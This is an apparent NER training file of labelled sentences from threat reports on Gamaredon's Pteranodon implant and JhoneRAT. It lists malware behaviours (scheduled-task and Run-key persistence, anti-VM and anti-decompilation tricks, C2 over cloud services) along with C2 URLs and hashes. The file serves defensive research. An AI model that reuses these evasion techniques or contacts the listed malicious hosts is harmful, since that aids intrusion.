{"text": "At this point , the batch script renames the “ 28847 ” file in “ 28847.exe ” , opens it using “ pfljk ,fkbcerbgblfhs ” as password and the file contained inside the “ 28847.exe ” file will be renamed in “ WuaucltIC.exe ” .", "spans": {"Indicator: 28847": [[47, 52]], "Indicator: 28847.exe": [[64, 73], [164, 173]], "Indicator: WuaucltIC.exe": [[201, 214]]}, "info": {"id": "aptner_train_001094", "source": "aptner_train"}}
{"text": "Finally , it will be run using “ post.php ” as argument .", "spans": {"Indicator: post.php": [[33, 41]]}, "info": {"id": "aptner_train_001095", "source": "aptner_train"}}
{"text": "The fact that the “ 28847.exe ” file can be opened makes us understand that  the “ 28847 ” file is another SFX file .", "spans": {"Indicator: 28847.exe": [[20, 29]], "Indicator: 28847": [[82, 87]], "System: SFX": [[105, 108]]}, "info": {"id": "aptner_train_001096", "source": "aptner_train"}}
{"text": "Some static information about SFX are :", "spans": {"System: SFX": [[30, 33]]}, "info": {"id": "aptner_train_001097", "source": "aptner_train"}}
{"text": "Hash : 3dfadf9f23b4c5d17a0c5f5e89715d239c832dbe78551da67815e41e2000fdf1 .", "spans": {"Indicator: 3dfadf9f23b4c5d17a0c5f5e89715d239c832dbe78551da67815e41e2000fdf1": [[7, 71]]}, "info": {"id": "aptner_train_001098", "source": "aptner_train"}}
{"text": "Threat : Gamaredon Pteranodon implant SFX archive .", "spans": {"Organization: Gamaredon": [[9, 18]], "Malware: Pteranodon": [[19, 29]], "System: SFX archive": [[38, 49]]}, "info": {"id": "aptner_train_001099", "source": "aptner_train"}}
{"text": "Brief Description : SFX Archive Second Stage .", "spans": {"System: SFX Archive": [[20, 31]]}, "info": {"id": "aptner_train_001100", "source": "aptner_train"}}
{"text": "Ssdeep : 24576:vmoO8itbaZiW+qJnmCcpv5lKbbJAiUqKXM : OoZwxVvfoaPu .", "spans": {"System: Ssdeep": [[0, 6]]}, "info": {"id": "aptner_train_001101", "source": "aptner_train"}}
{"text": "Exploring it , it is possible to see several files inside of it ,  as well as the 6323 file .", "spans": {"Indicator: 6323": [[81, 85]]}, "info": {"id": "aptner_train_001102", "source": "aptner_train"}}
{"text": "In this case , the SFX archive contains 8 files : five of them are legit DLLs used by the “ 6323 ” executable to interoperate with the OLE format defined and used by Microsoft Office .", "spans": {"Indicator: SFX archive": [[19, 30]], "System: DLLs": [[71, 75]], "Indicator: 6323": [[90, 94]], "System: OLE": [[133, 136]], "System: Microsoft Office": [[163, 178]]}, "info": {"id": "aptner_train_001103", "source": "aptner_train"}}
{"text": "The “ ExcelMyMacros.txt ” and “ wordMacros.txt ” files contain further macro script , described next .", "spans": {"Indicator: ExcelMyMacros.txt": [[6, 23]], "Indicator: wordMacros.txt": [[32, 46]]}, "info": {"id": "aptner_train_001104", "source": "aptner_train"}}
{"text": "So , static analysis on the “ 6323 ” file shown as its nature : it is written using Microsoft Visual Studio .NET , therefore easily to reverse .", "spans": {"Indicator: 6323": [[30, 34]], "System: Microsoft Visual Studio .NET": [[83, 111]]}, "info": {"id": "aptner_train_001105", "source": "aptner_train"}}
{"text": "Before reversing the executable , it is possible to clean it allowing the size reduction and the junk instruction reduction inside the code .", "spans": {}, "info": {"id": "aptner_train_001106", "source": "aptner_train"}}
{"text": "The below image shows the information about the sample before and after the cleaning .", "spans": {}, "info": {"id": "aptner_train_001107", "source": "aptner_train"}}
{"text": "The first check performed is on the arguments : if the arguments length is equal to zero , the malware terminates the execution .", "spans": {}, "info": {"id": "aptner_train_001108", "source": "aptner_train"}}
{"text": "After that , the malware checks if the existence of the files “ ExcelMyMacros.txt ” and “ wordMacros.txt ” in the same path where it is executed : if true then it reads their contents otherwise it will exit .", "spans": {"Indicator: ExcelMyMacros.txt": [[63, 80]], "Indicator: wordMacros.txt": [[89, 103]]}, "info": {"id": "aptner_train_001109", "source": "aptner_train"}}
{"text": "As visible in the previous figure , the only difference between the files are in the variable , registry key and path used by Word rather than by Excel .", "spans": {"System: Excel": [[144, 149]]}, "info": {"id": "aptner_train_001110", "source": "aptner_train"}}
{"text": "Finally the macros are executed using the Office engine .", "spans": {"System: macros": [[12, 18]], "System: Office": [[42, 47]]}, "info": {"id": "aptner_train_001111", "source": "aptner_train"}}
{"text": "So let ’s start to dissect the macros .", "spans": {"System: macros": [[31, 37]]}, "info": {"id": "aptner_train_001112", "source": "aptner_train"}}
{"text": "For a better comprehension we will be considering only one macro and in the specific case we will analyze “ wordMacros.txt ”   ones .", "spans": {"System: macro": [[59, 64]], "Indicator: wordMacros.txt": [[107, 121]]}, "info": {"id": "aptner_train_001113", "source": "aptner_train"}}
{"text": "First of all the macro will set the registry key “ HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\ ” & Application.Version & _ ” \\Word\\Security\\ ” and then will set up two scheduled tasks that will start respectively every 12 and 15 minutes : the first one will run a “ IndexOffice.vbs ” in the path “ %APPDATA%\\Microsoft\\Office\\ ” and the second one will run “ IndexOffice.exe ” in the same path .", "spans": {"System: macro": [[17, 22]], "Indicator: IndexOffice.vbs": [[265, 279]], "Indicator: IndexOffice.exe": [[355, 369]]}, "info": {"id": "aptner_train_001114", "source": "aptner_train"}}
{"text": "Finally , the malware will write the “ IndexOffice.txt ” file in the  “ %APPDATA%\\Microsoft\\Office\\ ” path .", "spans": {"Indicator: IndexOffice.txt": [[39, 53]]}, "info": {"id": "aptner_train_001115", "source": "aptner_train"}}
{"text": "The script will check the presence of the  “ IndexOffice.exe ” artifact : if true then it will delete it and it will download a new file/script from “ http://masseffect.space/<PC_Name>_<Hex_Drive_SN>/post.php ” .", "spans": {"Indicator: IndexOffice.exe": [[45, 59]], "Indicator: http://masseffect.space/<PC_Name>_<Hex_Drive_SN>/post.php": [[149, 206]]}, "info": {"id": "aptner_train_001116", "source": "aptner_train"}}
{"text": "The malware tries to save the C2 response and encoding it using Encode function .", "spans": {"System: C2": [[30, 32]]}, "info": {"id": "aptner_train_001117", "source": "aptner_train"}}
{"text": "This function accepts three parameters : the input file , the output file and the arrKey ; arrKey is calculated thanks to  GetKey function that accepts as input the Hexadecimal value of the Driver SN installed on the machine and returns the key as results .", "spans": {"System: Driver SN": [[188, 197]]}, "info": {"id": "aptner_train_001118", "source": "aptner_train"}}
{"text": "Gamaredon cyberwarfare operations against Ukraine are still active .", "spans": {"Organization: Gamaredon": [[0, 9]]}, "info": {"id": "aptner_train_001119", "source": "aptner_train"}}
{"text": "This technical analysis reveals that the modus operandi of the Group has remained almost identical over the years .", "spans": {}, "info": {"id": "aptner_train_001120", "source": "aptner_train"}}
{"text": "The massive use of weaponized Office documents , Office template injection , sfx archives , wmi and some VBA macro stages that dinamically changes ,  make the Pterodon attack chain very malleable and adaptive .", "spans": {"System: Office": [[30, 35], [48, 53]], "System: sfx archives": [[75, 87]], "System: wmi": [[90, 93]], "System: VBA macro": [[103, 112]], "System: stages": [[113, 119]], "Malware: Pterodon": [[157, 165]]}, "info": {"id": "aptner_train_001121", "source": "aptner_train"}}
{"text": "However , the introduction of a .Net component is a novelty compared to previous Pterodon samples .", "spans": {"System: .Net": [[32, 36]], "Malware: Pterodon": [[81, 89]]}, "info": {"id": "aptner_train_001122", "source": "aptner_train"}}
{"text": "Gamaredon : 76ea98e1861c1264b340cf3748c3ec74473b04d042cd6bfda9ce51d086cb5a1a .", "spans": {"Organization: Gamaredon": [[0, 9]], "Indicator: 76ea98e1861c1264b340cf3748c3ec74473b04d042cd6bfda9ce51d086cb5a1a": [[12, 76]]}, "info": {"id": "aptner_train_001123", "source": "aptner_train"}}
{"text": "Gamaredon : e2cb06e0a5c14b4c5f58d0e56a1dc10b6a1007cf56c77ae6cb07946c3dfe82d8 .", "spans": {"Organization: Gamaredon": [[0, 9]], "Indicator: e2cb06e0a5c14b4c5f58d0e56a1dc10b6a1007cf56c77ae6cb07946c3dfe82d8": [[12, 76]]}, "info": {"id": "aptner_train_001124", "source": "aptner_train"}}
{"text": "Gamaredon : def13f94cdf793df3e9b42b168550a09ee906f07f61a3f5c9d25ceca44e8068c .", "spans": {"Organization: Gamaredon": [[0, 9]], "Indicator: def13f94cdf793df3e9b42b168550a09ee906f07f61a3f5c9d25ceca44e8068c": [[12, 76]]}, "info": {"id": "aptner_train_001125", "source": "aptner_train"}}
{"text": "Gamaredon : c1524a4573bc6acbe59e559c2596975c657ae6bbc0b64f943fffca663b98a95f .", "spans": {"Organization: Gamaredon": [[0, 9]], "Indicator: c1524a4573bc6acbe59e559c2596975c657ae6bbc0b64f943fffca663b98a95f": [[12, 76]]}, "info": {"id": "aptner_train_001126", "source": "aptner_train"}}
{"text": "Gamaredon : 86977a785f361d4f26eb3e189293c0e30871de3c93b19653c26a31dd4ed068cc .", "spans": {"Organization: Gamaredon": [[0, 9]], "Indicator: 86977a785f361d4f26eb3e189293c0e30871de3c93b19653c26a31dd4ed068cc": [[12, 76]]}, "info": {"id": "aptner_train_001127", "source": "aptner_train"}}
{"text": "Gamaredon : http://win-apu.ddns.net/apu.dot/ .", "spans": {"Organization: Gamaredon": [[0, 9]], "Indicator: http://win-apu.ddns.net/apu.dot/": [[12, 44]]}, "info": {"id": "aptner_train_001128", "source": "aptner_train"}}
{"text": "Gamaredon : http://get-icons.ddns.net/apu.dot/ .", "spans": {"Organization: Gamaredon": [[0, 9]], "Indicator: http://get-icons.ddns.net/apu.dot/": [[12, 46]]}, "info": {"id": "aptner_train_001129", "source": "aptner_train"}}
{"text": "Gamaredon : http://masseffect.space/ .", "spans": {"Organization: Gamaredon": [[0, 9]], "Indicator: http://masseffect.space/": [[12, 36]]}, "info": {"id": "aptner_train_001130", "source": "aptner_train"}}
{"text": "JhoneRAT : Cloud based python RAT targeting Middle Eastern countries .", "spans": {"Malware: JhoneRAT": [[0, 8]], "System: python": [[23, 29]], "System: RAT": [[30, 33]]}, "info": {"id": "aptner_train_001131", "source": "aptner_train"}}
{"text": "Today , Cisco Talos is unveiling the details of a new RAT we have identified we 're calling \" JhoneRAT \" .", "spans": {"Organization: Cisco Talos": [[8, 19]], "System: RAT": [[54, 57]], "Malware: JhoneRAT": [[94, 102]]}, "info": {"id": "aptner_train_001132", "source": "aptner_train"}}
{"text": "This new RAT is dropped to the victims via malicious Microsoft Office docume .", "spans": {"System: RAT": [[9, 12]], "Organization: Microsoft": [[53, 62]], "System: Office": [[63, 69]], "System: docume": [[70, 76]]}, "info": {"id": "aptner_train_001133", "source": "aptner_train"}}
{"text": "The dropper , along with the Python RAT , attempts to gather information on the victim 's machine and then uses multiple cloud services : Google Drive , Twitter , ImgBB and Google Forms .", "spans": {"System: Python RAT": [[29, 39]], "System: Google Drive": [[138, 150]], "System: Twitter": [[153, 160]], "System: ImgBB": [[163, 168]], "System: Google Forms": [[173, 185]]}, "info": {"id": "aptner_train_001134", "source": "aptner_train"}}
{"text": "The RAT attempts to download additional payloads and upload the information gathered during the reconnaissance phase .", "spans": {"System: RAT": [[4, 7]]}, "info": {"id": "aptner_train_001135", "source": "aptner_train"}}
{"text": "This particular RAT attempts to target a very specific set of Arabic-speaking countries .", "spans": {"System: RAT": [[16, 19]]}, "info": {"id": "aptner_train_001136", "source": "aptner_train"}}
{"text": "The filtering is performed by checking the keyboard layout of the infected systems .", "spans": {}, "info": {"id": "aptner_train_001137", "source": "aptner_train"}}
{"text": "Based on the analysed sample , JhoneRAT targets Saudi Arabia , Iraq , Egypt , Libya , Algeria , Morocco , Tunisia , Oman , Yemen , Syria , UAE , Kuwait , Bahrain and Lebanon .", "spans": {"Malware: JhoneRAT": [[31, 39]]}, "info": {"id": "aptner_train_001138", "source": "aptner_train"}}
{"text": "The campaign shows an actor that developed a homemade RAT that works in multiple layers hosted on cloud providers .", "spans": {}, "info": {"id": "aptner_train_001139", "source": "aptner_train"}}
{"text": "JhoneRAT is developed in python but not based on public source code , as it is often the case for this type of malware .", "spans": {"Malware: JhoneRAT": [[0, 8]], "System: python": [[25, 31]]}, "info": {"id": "aptner_train_001140", "source": "aptner_train"}}
{"text": "The attackers put great effort to carefully select the targets located in specific countries based on the victim 's keyboard layout .", "spans": {}, "info": {"id": "aptner_train_001141", "source": "aptner_train"}}
{"text": "Everything starts with a malicious document using a well-known vulnerability to download a malicious document hosted on the internet .", "spans": {}, "info": {"id": "aptner_train_001142", "source": "aptner_train"}}
{"text": "For this campaign , the attacker chose to use a cloud provider ( Google ) with a good reputation to avoid URL blacklisting .", "spans": {"Organization: Google": [[65, 71]]}, "info": {"id": "aptner_train_001143", "source": "aptner_train"}}
{"text": "The malware is divided into a couple of layers — each layer downloads a new payload on a cloud provider to get the final RAT developed in python and that uses additional providers such as Twitter and ImgBB .", "spans": {"System: RAT": [[121, 124]], "System: python": [[138, 144]], "System: Twitter": [[188, 195]], "System: ImgBB": [[200, 205]]}, "info": {"id": "aptner_train_001144", "source": "aptner_train"}}
{"text": "This RAT is a good example of how a highly focused attack that tries to blend its network traffic into the crowd can be highly effective .", "spans": {"System: RAT": [[5, 8]]}, "info": {"id": "aptner_train_001145", "source": "aptner_train"}}
{"text": "In this campaign , focusing detection of the network is not the best approach .", "spans": {}, "info": {"id": "aptner_train_001146", "source": "aptner_train"}}
{"text": "Instead , the detection must be based on the behaviour on the operating system .", "spans": {}, "info": {"id": "aptner_train_001147", "source": "aptner_train"}}
{"text": "Attackers can abuse well-known cloud providers and abuse their reputations in order to avoid detection .", "spans": {"System: well-known cloud providers": [[20, 46]]}, "info": {"id": "aptner_train_001148", "source": "aptner_train"}}
{"text": "The fact that this attacker decided to leverage cloud services and four different services — and not their own infrastructure — is smart from an opsec point of view .", "spans": {"System: cloud services": [[48, 62]], "System: four different services": [[67, 90]]}, "info": {"id": "aptner_train_001149", "source": "aptner_train"}}
{"text": "It is hard for the targets to identify legitimate and malicious traffic to cloud provider infrastructure .", "spans": {}, "info": {"id": "aptner_train_001150", "source": "aptner_train"}}
{"text": "Moreover , this kind of infrastructure uses HTTPS and the flow is encrypted that makes man-in-the-middle interception more complicated for the defender .", "spans": {}, "info": {"id": "aptner_train_001151", "source": "aptner_train"}}
{"text": "It is not the first time an attacker used only cloud providers .", "spans": {"System: cloud providers": [[47, 62]]}, "info": {"id": "aptner_train_001152", "source": "aptner_train"}}
{"text": "Even while using these services , the authors of this JhoneRAT went further and used different user-agent strings depending on the request , and even on the downloaders the authors used other user-agent strings .", "spans": {"Malware: JhoneRAT": [[54, 62]]}, "info": {"id": "aptner_train_001153", "source": "aptner_train"}}
{"text": "We already published a couple of articles about ROKRAT ( here , here , here and here ) where another unrelated actor , Group123 , made the same choice but with different providers .", "spans": {"Malware: ROKRAT": [[48, 54]], "Organization: Group123": [[119, 127]]}, "info": {"id": "aptner_train_001154", "source": "aptner_train"}}
{"text": "The attacker implemented filtering based on the keyboard 's layout .", "spans": {}, "info": {"id": "aptner_train_001155", "source": "aptner_train"}}
{"text": "The malware is executed only for the following layout , the country is based on the Microsoft website :", "spans": {"Organization: Microsoft": [[84, 93]]}, "info": {"id": "aptner_train_001156", "source": "aptner_train"}}
{"text": "' 0401 ' : Saudi Arabia . ' 0801 ' : Iraq . ' 0c01 ' : Egypt . ' 1001 ' : Libya . ' 1401 ' : Algeria . ' 1801 ' : Morocco . ' 1c01 ' : Tunisia . ' 2001 ' : Oman . ' 2401 ' : Yemen . ' 2801 ' : Syria . ' 3801 ' : UAE . ' 3401 ' : Kuwait . ' 3c01 ' : Bahrain . ' 3001 ' : Lebanon .", "spans": {}, "info": {"id": "aptner_train_001157", "source": "aptner_train"}}
{"text": "We identified three malicious Microsoft Office documents that download and load an additional Office document with a Macro .", "spans": {"Organization: Microsoft": [[30, 39]], "System: Office": [[40, 46]], "System: Macro": [[117, 122]]}, "info": {"id": "aptner_train_001158", "source": "aptner_train"}}
{"text": "The oldest one from November 2019 , named \" Urgent.docx \" .", "spans": {"Indicator: Urgent.docx": [[44, 55]]}, "info": {"id": "aptner_train_001159", "source": "aptner_train"}}
{"text": "The author of the document asks to enable editing in English and in Arabic .", "spans": {}, "info": {"id": "aptner_train_001160", "source": "aptner_train"}}
{"text": "The second document from the beginning of January is named \" fb.docx \" and contains usernames and passwords from an alleged \" Facebook \" leak .", "spans": {"Indicator: fb.docx": [[61, 68]], "Organization: Facebook": [[126, 134]]}, "info": {"id": "aptner_train_001161", "source": "aptner_train"}}
{"text": "The more recent document is from mid-January and alleged to be from a United Arab Emirate organization .", "spans": {}, "info": {"id": "aptner_train_001162", "source": "aptner_train"}}
{"text": "The author blurred the content and asks the user to enable editing to see the content .", "spans": {}, "info": {"id": "aptner_train_001163", "source": "aptner_train"}}
{"text": "In the three documents , an additional Office document containing a Macro is downloaded and executed .", "spans": {"System: Office document": [[39, 54]], "System: Macro": [[68, 73]]}, "info": {"id": "aptner_train_001164", "source": "aptner_train"}}
{"text": "The documents are located on Google Drive .", "spans": {"System: Google Drive": [[29, 41]]}, "info": {"id": "aptner_train_001165", "source": "aptner_train"}}
{"text": "The template located on Google Drive contains a macro .", "spans": {"System: Google Drive": [[24, 36]], "System: macro": [[48, 53]]}, "info": {"id": "aptner_train_001166", "source": "aptner_train"}}
{"text": "The macro contains a virtual machine detection technique based on the serial number of the disks available in the victim environment .", "spans": {}, "info": {"id": "aptner_train_001167", "source": "aptner_train"}}
{"text": "Indeed , some VMs do not have serial numbers and the macro is executed only if a serial number exists .", "spans": {"System: VMs": [[14, 17]]}, "info": {"id": "aptner_train_001168", "source": "aptner_train"}}
{"text": "A WMIC command is executed to get this information on the targeted system .", "spans": {"System: WMIC": [[2, 6]]}, "info": {"id": "aptner_train_001169", "source": "aptner_train"}}
{"text": "If a serial number exists , the rest of the code is executed .", "spans": {}, "info": {"id": "aptner_train_001170", "source": "aptner_train"}}
{"text": "The purpose is to download an image from a new Google Drive link .", "spans": {}, "info": {"id": "aptner_train_001171", "source": "aptner_train"}}
{"text": "It is interesting to note that the filename of the downloaded image is randomly generated based on a dictionary : Array (\"cartoon\" , \"img\" ,\"photo\") .", "spans": {}, "info": {"id": "aptner_train_001172", "source": "aptner_train"}}
{"text": "The filename will be cartoon.jpg or img.jpg or photo.jpg and the image usually depicts a cartoon .", "spans": {"Indicator: cartoon.jpg": [[21, 32]], "Indicator: img.jpg": [[36, 43]], "Indicator: photo.jpg": [[47, 56]]}, "info": {"id": "aptner_train_001173", "source": "aptner_train"}}
{"text": "The image file is a real image with a base64-encoded binary appended at the end .", "spans": {}, "info": {"id": "aptner_train_001174", "source": "aptner_train"}}
{"text": "The malware author has a curious sense of humor .", "spans": {}, "info": {"id": "aptner_train_001175", "source": "aptner_train"}}
{"text": "The base64 data and image are separated by the \" **** \" string .", "spans": {}, "info": {"id": "aptner_train_001176", "source": "aptner_train"}}
{"text": "The decoded binary filename is also randomly generated based on a dictionary : Array(\"proc\" , \"chrome\" , \"winrar\") .", "spans": {}, "info": {"id": "aptner_train_001177", "source": "aptner_train"}}
{"text": "It can be proc.exe or chrome.exe or winrar.exe .", "spans": {"Indicator: proc.exe": [[10, 18]], "Indicator: chrome.exe": [[22, 32]], "Indicator: winrar.exe": [[36, 46]]}, "info": {"id": "aptner_train_001178", "source": "aptner_train"}}
{"text": "The decoded base64 data is an AutoIT binary .", "spans": {"System: AutoIT": [[30, 36]]}, "info": {"id": "aptner_train_001179", "source": "aptner_train"}}
{"text": "This binary downloads a new file on Google Drive .", "spans": {"System: Google Drive": [[36, 48]]}, "info": {"id": "aptner_train_001180", "source": "aptner_train"}}
{"text": "The filename is also randomly generated based on a dictionary $ARRAY[5]=[\"prc\" ,\"winrar\" ,\"chrome\" ,\"sync\" ,\"COM surr\"] .", "spans": {}, "info": {"id": "aptner_train_001181", "source": "aptner_train"}}
{"text": "The final payload is a remote access tool ( RAT ) written in python .", "spans": {"System: remote access tool": [[23, 41]], "System: RAT": [[44, 47]], "System: python": [[61, 67]]}, "info": {"id": "aptner_train_001182", "source": "aptner_train"}}
{"text": "We named this RAT \" JhoneRAT \" .", "spans": {"System: RAT": [[14, 17]], "Malware: JhoneRAT": [[20, 28]]}, "info": {"id": "aptner_train_001183", "source": "aptner_train"}}
{"text": "The python code is wrapped into an executable using pyinstaller .", "spans": {"System: python": [[4, 10]]}, "info": {"id": "aptner_train_001184", "source": "aptner_train"}}
{"text": "It uses minimal obfuscation applied only on variables and function naming .", "spans": {}, "info": {"id": "aptner_train_001185", "source": "aptner_train"}}
{"text": "The RAT starts by launching three threads .", "spans": {"System: RAT": [[4, 7]]}, "info": {"id": "aptner_train_001186", "source": "aptner_train"}}
{"text": "The first is responsible for checking if the system has the targeted keyboard layout — this is exclusively in Arabic-speaking countries .", "spans": {}, "info": {"id": "aptner_train_001187", "source": "aptner_train"}}
{"text": "The second will create the persistence and , finally , the last one to be started is the main cycle for the RAT .", "spans": {"System: RAT": [[108, 111]]}, "info": {"id": "aptner_train_001188", "source": "aptner_train"}}
{"text": "As we explained before , the RAT targets specific countries by checking the keyboard 's layout .", "spans": {"System: RAT": [[29, 32]]}, "info": {"id": "aptner_train_001189", "source": "aptner_train"}}
{"text": "In fact , this is one of the first checks it performs when it is executed .", "spans": {}, "info": {"id": "aptner_train_001190", "source": "aptner_train"}}
{"text": "The persistence is achieved by adding an entry with the name \" ChromeUpdater \" to the ' Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run ' .", "spans": {}, "info": {"id": "aptner_train_001191", "source": "aptner_train"}}
{"text": "This RAT uses three different cloud services to perform all its command and control ( C2 ) activities .", "spans": {"System: RAT": [[5, 8]], "System: command and control": [[64, 83]], "System: C2": [[86, 88]]}, "info": {"id": "aptner_train_001192", "source": "aptner_train"}}
{"text": "It checks for new commands in the tweets from the handle @jhone87438316 ( suspended by Twitter ) every 10 seconds using the BeautifulSoup HTML parser to identify new tweets .", "spans": {"System: Twitter": [[87, 94]], "System: BeautifulSoup HTML parser": [[124, 149]]}, "info": {"id": "aptner_train_001193", "source": "aptner_train"}}
{"text": "These commands can be issued to a specific victim based on the UID generated on each target ( by using the disk serial and contextual information such as the hostname , the antivirus and the OS ) or to all of them .", "spans": {}, "info": {"id": "aptner_train_001194", "source": "aptner_train"}}
{"text": "The Exfiltration , however , is done via other cloud providers .", "spans": {"System: cloud providers": [[47, 62]]}, "info": {"id": "aptner_train_001195", "source": "aptner_train"}}
{"text": "The screenshots are exfiltrated via the ImgBB website .", "spans": {"System: ImgBB": [[40, 45]]}, "info": {"id": "aptner_train_001196", "source": "aptner_train"}}
{"text": "The remaining commands send feedback by posting data into Google Forms .", "spans": {"System: Google Forms": [[58, 70]]}, "info": {"id": "aptner_train_001197", "source": "aptner_train"}}
{"text": "Finally , the RAT is able to download files encoded in base64 on Google Drive .", "spans": {"System: RAT": [[14, 17]], "System: Google Drive": [[65, 77]]}, "info": {"id": "aptner_train_001198", "source": "aptner_train"}}
{"text": "Feature-wise , the RAT has three commands :", "spans": {"System: RAT": [[19, 22]]}, "info": {"id": "aptner_train_001199", "source": "aptner_train"}}
{"text": "Take a screenshot and upload it to ImgBB .", "spans": {"System: ImgBB": [[35, 40]]}, "info": {"id": "aptner_train_001200", "source": "aptner_train"}}
{"text": "Download binary disguised has a picture from Google Drive and execute it .", "spans": {"System: Google Drive": [[45, 57]]}, "info": {"id": "aptner_train_001201", "source": "aptner_train"}}
{"text": "Execute a command and send the output to Google Forms .", "spans": {"System: Google Forms": [[41, 53]]}, "info": {"id": "aptner_train_001202", "source": "aptner_train"}}
{"text": "The attacker put a couple of tricks in place to avoid execution on virtual machines ( sandbox ) .", "spans": {"System: sandbox": [[86, 93]]}, "info": {"id": "aptner_train_001203", "source": "aptner_train"}}
{"text": "The first trick is the check of the serial number of the disk .", "spans": {}, "info": {"id": "aptner_train_001204", "source": "aptner_train"}}
{"text": "The actor used the same technique in the macro and in the JhoneRAT .", "spans": {"System: macro": [[41, 46]], "Malware: JhoneRAT": [[58, 66]]}, "info": {"id": "aptner_train_001205", "source": "aptner_train"}}
{"text": "By default , most of the virtual machines do not have a serial number on the disk .", "spans": {}, "info": {"id": "aptner_train_001206", "source": "aptner_train"}}
{"text": "The attacker used a second trick to avoid analysis of the python code .", "spans": {"System: python": [[58, 64]]}, "info": {"id": "aptner_train_001207", "source": "aptner_train"}}
{"text": "The actor used the same trick that FireEye in the Flare-On 6 : Challenge 7: They removed the header of the python bytecode .", "spans": {"Organization: FireEye": [[35, 42]], "System: Flare-On 6": [[50, 60]], "System: python": [[107, 113]]}, "info": {"id": "aptner_train_001208", "source": "aptner_train"}}
{"text": "It can be perfectly executed without the header , but tools such as uncompyle6 need this header : $ uncompyle6 final2 .", "spans": {"System: uncompyle6": [[68, 78], [100, 110]]}, "info": {"id": "aptner_train_001209", "source": "aptner_train"}}
{"text": "ImportError : Unknown magic number 227 in final2 .", "spans": {}, "info": {"id": "aptner_train_001210", "source": "aptner_train"}}
{"text": "Additionally , the generated code by uncompyle6 varies depending on the version and the impact is important .", "spans": {"System: uncompyle6": [[37, 47]]}, "info": {"id": "aptner_train_001211", "source": "aptner_train"}}
{"text": "Based on our analysis and the behaviour of the executed malware , the correct interpretation is the first one based on the oldest version of uncompyle6 .", "spans": {"System: uncompyle6": [[141, 151]]}, "info": {"id": "aptner_train_001212", "source": "aptner_train"}}
{"text": "For this specific condition , it is important because it 's filtering on the keyboard layout to identify the targets .", "spans": {}, "info": {"id": "aptner_train_001213", "source": "aptner_train"}}
{"text": "This campaign shows a threat actor interested in specific Middle Eastern and Arabic-speaking countries .", "spans": {}, "info": {"id": "aptner_train_001214", "source": "aptner_train"}}
{"text": "It also shows us an actor that puts effort in opsec by only using cloud providers .", "spans": {"System: opsec": [[46, 51]], "System: cloud providers": [[66, 81]]}, "info": {"id": "aptner_train_001215", "source": "aptner_train"}}
{"text": "The malicious documents , the droppers and the RAT itself are developed around cloud providers .", "spans": {"System: RAT": [[47, 50]], "System: cloud providers": [[79, 94]]}, "info": {"id": "aptner_train_001216", "source": "aptner_train"}}
{"text": "Additionally the attackers implemented anti-VM ( and sandbox ) and anti-analysis tricks to hide the malicious activities to the analyst .", "spans": {"System: anti-VM": [[39, 46]], "System: sandbox": [[53, 60]], "System: anti-analysis tricks": [[67, 87]]}, "info": {"id": "aptner_train_001217", "source": "aptner_train"}}
{"text": "For example , the VM or the sandbox must have the keyboard layout of the targeted countries and a disk serial number .", "spans": {"System: VM": [[18, 20]], "System: sandbox": [[28, 35]]}, "info": {"id": "aptner_train_001218", "source": "aptner_train"}}
{"text": "This campaign started in November 2019 and it is still ongoing .", "spans": {}, "info": {"id": "aptner_train_001219", "source": "aptner_train"}}
{"text": "At this time , the API key is revoked and the Twitter account is suspended .", "spans": {"System: Twitter": [[46, 53]]}, "info": {"id": "aptner_train_001220", "source": "aptner_train"}}
{"text": "However , the attacker can easily create new accounts and update the malicious files in order to still work .", "spans": {}, "info": {"id": "aptner_train_001221", "source": "aptner_train"}}
{"text": "This campaign shows us that network-based detection is important but must be completed by system behaviour analysis .", "spans": {}, "info": {"id": "aptner_train_001222", "source": "aptner_train"}}
{"text": "JhoneRAT : 273aa20c4857d98cfa51ae52a1c21bf871c0f9cd0bf55d5e58caba5d1829846f .", "spans": {"Malware: JhoneRAT": [[0, 8]], "Indicator: 273aa20c4857d98cfa51ae52a1c21bf871c0f9cd0bf55d5e58caba5d1829846f": [[11, 75]]}, "info": {"id": "aptner_train_001223", "source": "aptner_train"}}
{"text": "JhoneRAT : 29886dbbe81ead9e9999281e62ecf95d07acb24b9b0906b28beb65a84e894091 .", "spans": {"Malware: JhoneRAT": [[0, 8]], "Indicator: 29886dbbe81ead9e9999281e62ecf95d07acb24b9b0906b28beb65a84e894091": [[11, 75]]}, "info": {"id": "aptner_train_001224", "source": "aptner_train"}}
{"text": "JhoneRAT : d5f10a0b5c103100a3e74aa9014032c47aa8973b564b3ab03ae817744e74d079 .", "spans": {"Malware: JhoneRAT": [[0, 8]], "Indicator: d5f10a0b5c103100a3e74aa9014032c47aa8973b564b3ab03ae817744e74d079": [[11, 75]]}, "info": {"id": "aptner_train_001225", "source": "aptner_train"}}
{"text": "JhoneRAT : 6cc0c11c754e1e82bca8572785c27a364a18b0822c07ad9aa2dc26b3817b8aa4 .", "spans": {"Malware: JhoneRAT": [[0, 8]], "Indicator: 6cc0c11c754e1e82bca8572785c27a364a18b0822c07ad9aa2dc26b3817b8aa4": [[11, 75]]}, "info": {"id": "aptner_train_001226", "source": "aptner_train"}}
{"text": "JhoneRAT : 7e1121fca3ac7c2a447b61cda997f3a8202a36bf9bb08cca3402df95debafa69 .", "spans": {"Malware: JhoneRAT": [[0, 8]], "Indicator: 7e1121fca3ac7c2a447b61cda997f3a8202a36bf9bb08cca3402df95debafa69": [[11, 75]]}, "info": {"id": "aptner_train_001227", "source": "aptner_train"}}
{"text": "JhoneRAT : b4a43b108989d1dde87e58f1fd6f81252ef6ae19d2a5e8cd76440135e0fd6366 .", "spans": {"Malware: JhoneRAT": [[0, 8]], "Indicator: b4a43b108989d1dde87e58f1fd6f81252ef6ae19d2a5e8cd76440135e0fd6366": [[11, 75]]}, "info": {"id": "aptner_train_001228", "source": "aptner_train"}}
{"text": "JhoneRAT : https://drive.google.com/uc?export=download&amp;id=1vED0wN0arm9yu7C7XrbCdspLjpoPKfrQ .", "spans": {"Malware: JhoneRAT": [[0, 8]], "Malware: https://drive.google.com/uc?export=download&amp;id=1vED0wN0arm9yu7C7XrbCdspLjpoPKfrQ": [[11, 95]]}, "info": {"id": "aptner_train_001229", "source": "aptner_train"}}
